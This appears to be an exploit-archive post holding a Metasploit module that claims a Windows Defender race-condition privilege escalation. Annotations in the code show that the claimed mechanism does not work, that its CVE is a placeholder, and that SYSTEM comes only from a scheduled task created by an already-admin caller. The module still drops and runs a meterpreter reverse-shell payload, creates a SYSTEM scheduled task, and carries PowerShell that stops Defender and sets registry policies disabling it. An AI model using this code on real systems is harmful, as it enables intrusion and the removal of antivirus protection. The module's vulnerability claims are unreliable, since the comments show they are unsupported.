==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.microsoft.com/ |
==================================================================================================================================
[+] Summary : A race condition exists between Windows Defender's MpCleanCallbackFunction (cleanup routine) and Volume Shadow Copy creation.
This vulnerability allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Metasploit local module that claims a race-condition LPE against the
  # Windows Defender service process (MsMpEng.exe). Everything it does on the
  # target runs as inline PowerShell through `cmd_exec`. Read against the
  # description: no VirtualDisk API is called (mounting uses Mount-DiskImage),
  # no process token is duplicated or impersonated, and the race loop never
  # touches the mounted image or MpCleanCallbackFunction. The only step that
  # can yield a SYSTEM process is `schtasks /ru SYSTEM` in
  # `execute_system_payload`, which normally requires an already-elevated
  # caller. Per-method comments below list the on-host artifacts each step
  # leaves, which is what a detection engineer will want from this listing.
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and datastore options.
  #
  # The CVE reference is a placeholder ('2026-XXXXX') and the URL is the vendor
  # home page; no advisory is cited. `DefaultOptions` pins an x64 payload even
  # though an x86 target is listed. `Stability` already records that the
  # service is expected to go down.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation',
        # %q{} content is a literal; kept at column 0 so its bytes are unchanged.
        'Description' => %q{
A race condition exists between Windows Defender's MpCleanCallbackFunction
(cleanup routine) and Volume Shadow Copy creation. This vulnerability
allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM.
The exploit uses:
- Fake ISO mount via OpenVirtualDisk / AttachVirtualDisk
- Real-time priority escalation (REALTIME_PRIORITY_CLASS)
- Speed racing against Defender's cleanup routine
Successful exploitation results in:
1. Local Privilege Escalation to SYSTEM via CreateProcessAsUser
2. Use-after-free condition causing Windows Defender to crash
3. System remains without antivirus protection
Tested on Windows 10/11 with Windows Defender enabled.
},
        'License' => MSF_LICENSE,
        'Author' => ['indoushka'],
        'Platform' => ['win'],
        'Arch' => [ARCH_X64, ARCH_X86],
        'SessionTypes' => ['meterpreter', 'shell'],
        'Targets' => [
          ['Windows x64', { 'Arch' => ARCH_X64 }],
          ['Windows x86', { 'Arch' => ARCH_X86 }]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          # x64 payload regardless of the selected target architecture.
          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
          'EXITFUNC' => 'thread'
        },
        'References' => [
          ['URL', 'https://www.microsoft.com/'],
          # Placeholder identifier; no tracked CVE is referenced.
          ['CVE', '2026-XXXXX']
        ],
        'DisclosureDate' => '2026-06-11',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    # RACE_ITERATIONS bounds the loop in `trigger_race_condition` (each
    # successful iteration creates a shadow copy). DISABLE_DEFENDER and CLEANUP
    # gate the two policy/service-editing helpers called from `exploit`.
    register_options([
      OptInt.new('RACE_ITERATIONS', [false, 'Number of race iterations', 100]),
      OptBool.new('DISABLE_DEFENDER', [false, 'Attempt to permanently disable Defender', false]),
      OptBool.new('CLEANUP', [true, 'Restore Defender functionality after exploit', true])
    ])
  end

  # Reports Appears when a process named msmpeng.exe is visible, i.e. Defender
  # is running at all; no OS build or Defender version is inspected
  # (`get_system_version` exists but is never called).
  # @return [CheckCode]
  def check
    defender_pid = get_defender_pid
    if defender_pid
      print_good("Windows Defender is running (PID: #{defender_pid})")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  # @return [Integer, nil] PID of the first listed process whose name matches
  #   msmpeng.exe (case-insensitive), or nil when none is listed.
  def get_defender_pid
    processes = client.sys.process.get_processes
    processes.each do |proc|
      if proc['name'] && proc['name'].downcase == 'msmpeng.exe'
        return proc['pid']
      end
    end
    nil
  end

  # Logs and returns sysinfo['OS']. Not called by `check` or `exploit`.
  # @return [String]
  def get_system_version
    version = sysinfo['OS']
    print_status("Target OS: #{version}")
    version
  end

  # Writes a 2560-byte file ("CD001" repeated 512 times) with an .iso
  # extension into the TEMP directory and registers it for cleanup.
  #
  # This is not a valid ISO 9660 image (a real one carries its volume
  # descriptor at a 32 KiB offset), so `mount_iso` is expected to fail on it.
  # `datastore['TEMP']` is not registered by this module — presumably a global
  # option, verify; when unset, the single-quoted fallback literal yields
  # `C:\\Temp`, i.e. a doubled separator in the final path.
  # @return [String] path of the dropped file
  def create_fake_iso
    print_status("Creating fake ISO file for mount operation...")
    iso_path = "#{datastore['TEMP'] || 'C:\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.iso"
    register_file_for_cleanup(iso_path)
    iso_content = "CD001" * 512
    write_file(iso_path, iso_content)
    print_good("Fake ISO created: #{iso_path}")
    iso_path
  end

  # Mounts the file with the Storage-module cmdlet Mount-DiskImage — not the
  # OpenVirtualDisk/AttachVirtualDisk calls the description names. The inner
  # double quotes are escaped for the outer `powershell -Command "..."`, and
  # success is a substring match on MOUNT_SUCCESS in the captured output.
  # @param iso_path [String]
  # @return [Boolean]
  def mount_iso(iso_path)
    print_status("Mounting fake ISO using VirtualDisk API...")
    mount_ps = <<~PS
      $isoPath = "#{iso_path}"
      try {
      Mount-DiskImage -ImagePath $isoPath -PassThru
      Write-Host "MOUNT_SUCCESS"
      } catch {
      Write-Host "MOUNT_FAILED: $($_.Exception.Message)"
      }
    PS
    result = cmd_exec("powershell -Command \"#{mount_ps.gsub('"', '\\"')}\"")
    if result.include?("MOUNT_SUCCESS")
      print_good("ISO mounted successfully")
      return true
    else
      print_error("Failed to mount ISO: #{result}")
      return false
    end
  end

  # Best-effort Dismount-DiskImage. The script's UNMOUNT_SUCCESS/UNMOUNT_FAILED
  # output is returned from cmd_exec but not examined by the caller.
  # @param iso_path [String]
  def unmount_iso(iso_path)
    print_status("Unmounting ISO...")
    unmount_ps = <<~PS
      $isoPath = "#{iso_path}"
      try {
      Dismount-DiskImage -ImagePath $isoPath
      Write-Host "UNMOUNT_SUCCESS"
      } catch {
      Write-Host "UNMOUNT_FAILED"
      }
    PS
    cmd_exec("powershell -Command \"#{unmount_ps.gsub('"', '\\"')}\"")
  end

  # Sets PriorityClass = RealTime on `$pid`, PowerShell's automatic variable
  # for the *current* powershell.exe. That helper process exits as soon as this
  # command finishes, and the race loop later runs in a separate `cmd_exec`
  # invocation, so the priority change does not reach the racing process.
  # Raising to RealTime normally also needs the increase-base-priority
  # privilege (an elevated caller). `exploit` ignores the return value.
  # @return [Boolean] whether PRIORITY_SET appeared in the output
  def set_realtime_priority
    print_status("Setting process to realtime priority...")
    priority_ps = <<~PS
      $process = Get-Process -Id $pid
      $process.PriorityClass = [System.Diagnostics.ProcessPriorityClass]::RealTime
      Write-Host "PRIORITY_SET"
    PS
    result = cmd_exec("powershell -Command \"#{priority_ps.gsub('"', '\\"')}\"")
    result.include?("PRIORITY_SET")
  end

  # Runs `iterations` rounds of: create a VSS shadow copy of C:\ through WMI
  # (Win32_ShadowCopy.Create), start MpCmdRun.exe with "-Scan -ScanType 3"
  # (a custom scan, which appears to expect a -File argument that is not
  # supplied — confirm against MpCmdRun's usage text), write and delete
  # C:\Windows\Temp\race_test_<i>.txt, then sleep 50 ms.
  #
  # Nothing in the loop references the mounted image or
  # MpCleanCallbackFunction. RACE_TRIGGERED_AT_<i> is printed from the catch
  # block, i.e. whenever an iteration throws for any reason (for example the
  # shadow-copy call being denied to a non-admin caller), so a true result
  # means "an iteration failed", not that a race was observed.
  #
  # Artifacts: every successful iteration leaves a persistent shadow copy that
  # is never deleted (up to RACE_ITERATIONS of them, with the VSS/WMI log
  # entries that implies) plus repeated MpCmdRun launches.
  # @param iterations [Integer]
  # @return [Boolean]
  def trigger_race_condition(iterations)
    print_status("Triggering race condition (#{iterations} iterations)...")
    race_ps = <<~PS
      $iterations = #{iterations}
      $successCount = 0
      for ($i = 0; $i -lt $iterations; $i++) {
      try {
      $vss = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\\", "ClientAccessible")
      Start-Process -FilePath "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle Hidden
      $testFile = "C:\\Windows\\Temp\\race_test_$i.txt"
      "test" | Out-File -FilePath $testFile -ErrorAction SilentlyContinue
      Remove-Item $testFile -ErrorAction SilentlyContinue
      $successCount++
      } catch {
      Write-Host "RACE_TRIGGERED_AT_$i"
      }
      Start-Sleep -Milliseconds 50
      }
      Write-Host "COMPLETED:$successCount"
    PS
    result = cmd_exec("powershell -Command \"#{race_ps.gsub('"', '\\"')}\"")
    if result.include?("RACE_TRIGGERED")
      print_good("Race condition triggered successfully!")
      return true
    else
      print_warning("Race condition may not have triggered")
      return false
    end
  end

  # @return [String, nil] the WinDefend service status as printed by
  #   Get-Service (e.g. "Running"), "NOT_FOUND" when there is no such service,
  #   or nil when the output carried no DEFENDER_STATUS line.
  def check_defender_status
    status_ps = <<~PS
      $service = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
      if ($service) {
      Write-Host "DEFENDER_STATUS:$($service.Status)"
      } else {
      Write-Host "DEFENDER_STATUS:NOT_FOUND"
      }
    PS
    result = cmd_exec("powershell -Command \"#{status_ps.gsub('"', '\\"')}\"")
    result.match(/DEFENDER_STATUS:(\w+)/)&.captures&.first
  end

  # Optional step (DISABLE_DEFENDER=true): turns off real-time monitoring via
  # Set-MpPreference, stops and disables the WinDefend service, and writes the
  # DisableAntiSpyware and Real-Time Protection\DisableRealtimeMonitoring
  # policy values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender.
  #
  # Every command uses -ErrorAction SilentlyContinue and DEFENDER_DISABLED is
  # printed unconditionally, so the returned boolean only says the script ran,
  # not that anything changed. These are the settings tamper protection
  # guards; writes to them are the expected alert point for Defender/EDR.
  # @return [Boolean]
  def disable_defender_persistence
    print_status("Attempting to permanently disable Windows Defender...")
    disable_ps = <<~PS
      Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
      Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
      Set-Service -Name WinDefend -StartupType Disabled -ErrorAction SilentlyContinue
      $regPath = "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
      New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
      Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1 -Force -ErrorAction SilentlyContinue
      $rtpPath = "$regPath\\Real-Time Protection"
      New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
      Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring" -Value 1 -Force -ErrorAction SilentlyContinue
      Write-Host "DEFENDER_DISABLED"
    PS
    result = cmd_exec("powershell -Command \"#{disable_ps.gsub('"', '\\"')}\"")
    result.include?("DEFENDER_DISABLED")
  end

  # Removes the DisableAntiSpyware policy value, sets WinDefend back to
  # Automatic and starts it, and re-enables real-time monitoring. Runs
  # whenever CLEANUP is true (the default) even if
  # `disable_defender_persistence` never ran, so it can also strip a policy
  # value that pre-dated the module. The Real-Time Protection\
  # DisableRealtimeMonitoring value written by the disable step is not
  # removed here. Output is not checked.
  def restore_defender
    print_status("Restoring Windows Defender...")
    restore_ps = <<~PS
      Remove-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue
      Set-Service -Name WinDefend -StartupType Automatic -ErrorAction SilentlyContinue
      Start-Service -Name WinDefend -ErrorAction SilentlyContinue
      Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue
      Write-Host "DEFENDER_RESTORED"
    PS
    cmd_exec("powershell -Command \"#{restore_ps.gsub('"', '\\"')}\"")
  end

  # Drops the generated payload EXE to <TEMP>\<random>.exe (same single-quoted
  # fallback-path quirk as `create_fake_iso`), then tries two launch methods
  # in one PowerShell script.
  #
  # Method 1: `$token` is assigned IntPtr.Zero and never passed to any API;
  # the line `[System.IntPtr]::$token = $winlogon.Handle` tries to assign a
  # static member of IntPtr named by the variable's value and is expected to
  # throw, landing in the catch (M1_FAILED). Even if it did not throw,
  # Process.Start(ProcessStartInfo) launches the payload in the calling user's
  # own context — no token is duplicated or impersonated, so this path cannot
  # produce a SYSTEM process.
  #
  # Method 2: schtasks /create ... /ru SYSTEM followed by /run and /delete.
  # This needs an elevated caller, and schtasks is a native command whose
  # non-zero exit does not raise a PowerShell terminating error, so
  # PAYLOAD_EXECUTED_M2 is printed even when task creation fails. The success
  # test below is just a substring match on PAYLOAD_EXECUTED. Net effect: a
  # SYSTEM session, when it appears, comes from the task scheduler running
  # under an already-admin session, independent of the race loop.
  # @return [Boolean]
  def execute_system_payload
    print_status("Attempting to execute payload as SYSTEM...")
    payload_exe = generate_payload_exe
    payload_path = "#{datastore['TEMP'] || 'C:\\\\Windows\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.exe"
    write_file(payload_path, payload_exe)
    register_file_for_cleanup(payload_path)
    exec_ps = <<~PS
      $payload = "#{payload_path}"
      try {
      $winlogon = Get-Process -Name winlogon
      $token = [System.IntPtr]::Zero
      [System.IntPtr]::$token = $winlogon.Handle
      $startInfo = New-Object System.Diagnostics.ProcessStartInfo
      $startInfo.FileName = $payload
      $startInfo.UseShellExecute = $false
      $startInfo.CreateNoWindow = $true
      [System.Diagnostics.Process]::Start($startInfo)
      Write-Host "PAYLOAD_EXECUTED_M1"
      } catch {
      Write-Host "M1_FAILED: $($_.Exception.Message)"
      }
      try {
      $taskName = "TempTask#{Rex::Text.rand_text_alpha(6)}"
      schtasks /create /tn $taskName /tr $payload /sc once /st 00:00 /ru SYSTEM /f
      schtasks /run /tn $taskName
      schtasks /delete /tn $taskName /f
      Write-Host "PAYLOAD_EXECUTED_M2"
      } catch {
      Write-Host "M2_FAILED"
      }
    PS
    result = cmd_exec("powershell -Command \"#{exec_ps.gsub('"', '\\"')}\"")
    if result.include?("PAYLOAD_EXECUTED")
      print_good("Payload executed as SYSTEM!")
      return true
    else
      print_warning("Payload execution may have failed: #{result}")
      return false
    end
  end

  # Orchestration. Only warns when not admin (is_admin? from
  # Msf::Post::Windows::Priv) and aborts only when MsMpEng.exe is absent.
  # "Crash" detection is a before/after PID comparison around the race loop.
  # `original_defender_status` and `race_success` are assigned but never
  # read; the result of `execute_system_payload` is discarded and the final
  # "Exploit completed" line is printed regardless of outcome. With the
  # default CLEANUP=true, `restore_defender` edits the policy key and the
  # WinDefend service on every run.
  def exploit
    print_status("CVE-2026-XXXXX - Windows Defender MsMpEng.exe Race Condition LPE")
    print_status("Target: #{sysinfo['Computer']}")
    unless is_admin?
      print_warning("Not running as admin - exploit may fail")
    end
    defender_pid = get_defender_pid
    unless defender_pid
      print_error("Windows Defender is not running. Exploit may not work.")
      return
    end
    print_good("Windows Defender is running (PID: #{defender_pid})")
    # Captured but never used afterwards.
    original_defender_status = check_defender_status
    # Return value ignored; see set_realtime_priority for why it has no effect
    # on the race loop anyway.
    set_realtime_priority
    iso_path = create_fake_iso
    unless mount_iso(iso_path)
      print_warning("ISO mount failed, continuing anyway...")
    end
    iterations = datastore['RACE_ITERATIONS'] || 100
    # Assigned but never read.
    race_success = trigger_race_condition(iterations)
    unmount_iso(iso_path)
    new_defender_pid = get_defender_pid
    if new_defender_pid != defender_pid
      print_good("Windows Defender appears to have crashed/restarted!")
    else
      print_warning("Windows Defender still running - race condition may not have succeeded")
    end
    # Boolean result discarded.
    execute_system_payload
    if datastore['DISABLE_DEFENDER']
      disable_defender_persistence
      # Printed whether or not disable_defender_persistence changed anything.
      print_good("Windows Defender persistence disabled")
    end
    if datastore['CLEANUP']
      restore_defender
      print_good("Windows Defender restored")
    end
    print_good("Exploit completed - Check for SYSTEM session")
  end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================